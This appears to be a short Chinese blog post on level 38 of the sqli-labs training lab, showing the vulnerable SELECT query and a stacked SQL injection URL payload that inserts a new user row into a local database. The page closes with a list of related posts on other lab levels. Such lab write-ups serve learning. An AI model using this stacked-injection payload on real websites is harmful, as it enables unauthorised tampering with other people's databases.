Sqli-labs less 38
2016-08-11 22:00
477 查看
Less-38
学习了关于stacked injection的相关知识,我们在本关可以得到直接的运用。在执行select时的sql语句为:SELECT * FROM users WHERE id='$id' LIMIT 0,1
可以直接构造如下的payload:
http://127.0.0.1/sqli-labs/Less-38/index.php?id=1%27;insert%20into%20users(id,username,password)%20values%20(%2738%27,%27less38%27,%27hello%27)--+
再看数据表中的内容:可以看到less38已经添加。
相关文章推荐
- SQLi-LABS-Page-2-(Adv-Injections)less-23-38注入教程
- Sqli-labs less 65
- Sqli-labs less 46
- Sqli-labs less 31
- Sqli-labs之Less1-10
- SQLi-Labs 学习笔记(Less 1-10)
- sqlilabs 下的less7
- Sqli-labs less 64
- Sqli-labs less 45
- Sqli-labs less 29
- Sqli-labs less 9
- Sqli-labs less 44
- Sqli-labs less 28a
- Sqli-labs less 22
- Sqli-labs less 8
- sqlilabs闯关 less-1
- Sqli-labs less 28
- Sqli-labs less 19
- Sqli-labs less 7
- SQLi-Labs 学习笔记(Less 51-65)